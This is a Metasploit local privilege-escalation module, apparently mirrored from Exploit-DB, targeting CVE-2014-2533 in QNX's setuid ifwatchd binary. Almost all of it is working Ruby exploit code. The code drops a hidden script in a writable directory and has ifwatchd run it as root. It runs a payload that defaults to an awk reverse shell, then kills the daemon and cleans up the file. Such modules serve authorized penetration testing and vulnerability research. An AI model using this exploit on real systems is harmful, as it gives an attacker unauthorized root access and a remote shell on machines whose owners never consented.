ifwatchd – Privilege Escalation (Metasploit)

  • 作者: Metasploit
    日期: 2018-10-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/45575/
  • ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
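    class MetasploitModule < Msf::Exploit::Local
      Rank = ExcellentRanking

      include Msf::Post::Linux::Priv
      include Msf::Post::File
      include Msf::Exploit::FileDropper

      def initialize(info = {})
        super(update_info(info,
          'Name' => 'ifwatchd Privilege Escalation',
          'Description' => %q{
            This module attempts to gain root privileges on QNX 6.4.x and 6.5.x
            systems by exploiting the ifwatchd suid executable.

            ifwatchd allows users to specify scripts to execute using the '-A'
            command line argument; however, it does not drop privileges when
            executing user-supplied scripts, resulting in execution of arbitrary
            commands as root.

            This module has been tested successfully on QNX Neutrino 6.5.0 (x86)
            and 6.5.0 SP1 (x86).
          },
          'License' => MSF_LICENSE,
          'Author' =>
            [
              'cenobyte',      # Discovery and exploit
              'Tim Brown',     # Independent discovery
              'Brendan Coles'  # Metasploit
            ],
          'References' =>
            [
              ['CVE', '2014-2533'],
              ['BID', '66449'],
              ['EDB', '32153'],
              ['URL', 'http://seclists.org/bugtraq/2014/Mar/66']
            ],
          'DisclosureDate' => 'Mar 10 2014',
          'Platform' => 'unix', # QNX
          'Arch' => ARCH_CMD,
          'SessionTypes' => %w(shell meterpreter),
          'Targets' => [['Automatic', {}]],
          'Privileged' => true,
          'Payload' =>
            {
              'BadChars' => '',
              'DisableNops' => true,
              'Space' => 1024,
              'Compat' =>
                {
                  'PayloadType' => 'cmd',
                  'RequiredCmd' => 'gawk generic'
                }
            },
          'DefaultOptions' =>
            {
              'WfsDelay' => 10,
              'PAYLOAD' => 'cmd/unix/reverse_awk'
            }
        ))
        register_advanced_options [
          OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
        ]
      end

      # Absolute path of the setuid ifwatchd binary on the target.
      def ifwatchd_path
        '/sbin/ifwatchd'
      end

      # Directory the event script is dropped into (advanced option WritableDir).
      def base_dir
        datastore['WritableDir']
      end

      # Wraps +str+ in single quotes for /bin/sh.  Each embedded single quote is
      # turned into the '\'' idiom; nothing else is special inside single
      # quotes, so quotes, '$', backslashes and backticks in +str+ reach the
      # command untouched.  Used for every argument handed to cmd_exec below.
      def sh_quote(str)
        "'#{str.gsub("'") { "'\\''" }}'"
      end

      # Lines of the interface-arrival script that ifwatchd runs as root.
      #
      # The script records the PID(s) of processes whose command line contains
      # +script_path+ (the ifwatchd instance started with -A, and presumably the
      # sh running this script), runs the payload, then kills them so no root
      # daemon pointing at the soon-to-be-deleted script is left behind.
      #
      # The awk program is single-quoted inside the script: with double quotes
      # /bin/sh would expand '$2' as the script's second positional argument
      # instead of passing it to awk as the PID column selector.
      def event_script(script_path)
        [
          '#!/bin/sh',
          'PATH=/bin:/usr/bin',
          "IFWPID=$(ps -edaf | grep #{sh_quote(script_path)} | awk '!/grep/ { print $2 }')",
          payload.encoded,
          'kill -9 $IFWPID'
        ]
      end

      # Vulnerable only if the binary is setuid; a non-setuid ifwatchd executes
      # the script with the caller's own privileges.
      def check
        unless setuid? ifwatchd_path
          vprint_error "#{ifwatchd_path} is not setuid"
          return CheckCode::Safe
        end
        vprint_good "#{ifwatchd_path} is setuid"

        CheckCode::Detected
      end

      def exploit
        unless check == CheckCode::Detected
          fail_with Failure::NotVulnerable, 'Target not vulnerable'
        end

        if is_root?
          fail_with Failure::BadConfig, 'Session already has root privileges'
        end

        unless writable? base_dir
          fail_with Failure::BadConfig, "#{base_dir} is not writable"
        end

        # Hidden, randomly named script so it is not trivially spotted or
        # guessed by other local users of WritableDir.
        script_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
        quoted_path = sh_quote(script_path)

        print_status 'Writing interface arrival event script...'
        # The first line creates/truncates the file, the rest append.  Every
        # line -- the payload included -- is single-quoted for the remote shell,
        # so no payload character is interpreted before it reaches the file,
        # and a WritableDir containing spaces still redirects to the right path.
        event_script(script_path).each_with_index do |line, idx|
          cmd_exec "echo #{sh_quote(line)} #{idx.zero? ? '>' : '>>'} #{quoted_path}"
        end
        register_file_for_cleanup script_path

        cmd_exec "chmod +x #{quoted_path}"

        print_status "Executing #{ifwatchd_path}..."
        # ifwatchd is backgrounded and its output discarded; the trailing echo
        # returns the session prompt immediately instead of waiting on it.
        interface = 'lo0'
        cmd_exec "#{ifwatchd_path} -A #{quoted_path} -v #{interface} >/dev/null & echo "
      end
    end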